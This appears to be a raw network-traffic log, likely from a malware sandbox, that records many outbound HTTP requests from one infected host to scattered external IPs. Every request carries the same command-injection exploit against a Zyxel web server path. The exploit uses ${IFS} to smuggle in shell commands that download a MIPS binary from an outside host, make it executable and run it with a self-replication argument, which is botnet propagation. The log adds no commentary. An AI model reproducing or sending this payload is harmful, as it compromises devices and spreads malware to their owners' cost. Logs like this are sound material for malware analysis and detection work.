                                                        Feb 2, 2024 06:21:00.745791912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2153192.168.2.1437934125.112.218.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745835066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2154192.168.2.1453608206.201.52.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745866060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2155192.168.2.143876474.196.84.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745902061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2156192.168.2.1450676174.96.109.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745929956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2157192.168.2.1457946208.244.186.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.745986938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2158192.168.2.1460450145.36.54.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746001005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2159192.168.2.1437188180.181.169.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746043921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2160192.168.2.143286264.246.199.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746069908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2161192.168.2.1443802121.149.89.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746129990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2162192.168.2.1433690156.216.230.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746190071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2163192.168.2.1441446171.50.156.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746232033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2164192.168.2.144948481.167.87.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746280909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2165192.168.2.143422265.254.106.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746305943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2166192.168.2.145297485.143.253.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746366024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2167192.168.2.144937464.102.194.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746387959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2168192.168.2.1458866147.192.72.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746423006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2169192.168.2.1432796170.243.65.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746453047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2170192.168.2.1446262217.95.207.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746496916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2171192.168.2.1459212199.59.117.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746539116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2172192.168.2.1438578159.189.200.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746583939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2173192.168.2.144134493.88.115.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746622086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2174192.168.2.1447036156.105.31.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746659040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2175192.168.2.145631849.35.188.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746716976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2176192.168.2.1445532130.28.11.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746747971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2177192.168.2.1446888187.145.160.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746802092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2178192.168.2.144700680.143.39.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746843100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2179192.168.2.1437888102.135.206.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746879101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2180192.168.2.1439480179.164.90.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746927023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2181192.168.2.1447116131.205.228.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746967077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2182192.168.2.1438650130.226.6.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.746994019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2183192.168.2.143519635.184.32.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747021914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2184192.168.2.143698267.4.125.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747066021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2185192.168.2.143576294.91.73.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747109890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2186192.168.2.144253063.130.7.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747165918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2187192.168.2.1457926205.166.53.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747193098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2188192.168.2.1442874159.22.130.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747239113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2189192.168.2.144926676.45.1.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747294903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2190192.168.2.1438358132.30.189.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747334003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2191192.168.2.1457984101.20.192.187443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747369051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2192192.168.2.144790848.90.238.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747400999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2193192.168.2.145017878.93.142.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747442007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2194192.168.2.1433558164.59.116.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747486115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2195192.168.2.1452710181.172.177.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747529984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2196192.168.2.145316248.59.126.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747565985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2197192.168.2.1448034129.206.116.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747617960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2198192.168.2.1460252204.140.227.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747669935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2199192.168.2.1451996113.14.104.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747701883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2200192.168.2.1458030188.248.21.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747769117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2201192.168.2.143598865.1.53.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747798920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2202192.168.2.1442776133.72.148.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747828960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2203192.168.2.1450710169.43.189.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747859955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2204192.168.2.1437596168.182.242.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747900963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2205192.168.2.1445218196.6.199.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.747944117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2206192.168.2.1450214195.247.18.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748002052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2207192.168.2.1452340190.101.155.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748014927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2208192.168.2.144744265.52.138.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748087883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2209192.168.2.1455150157.44.99.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748121023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2210192.168.2.145993479.92.39.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748161077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2211192.168.2.1437326223.138.138.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748209953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2212192.168.2.1432908151.31.24.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748244047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2213192.168.2.1441760148.59.123.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748272896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2214192.168.2.1459762162.79.97.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:00.748322010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2215192.168.2.1438004166.122.197.160443
                                                        TimestampBytes transferredDirectionData
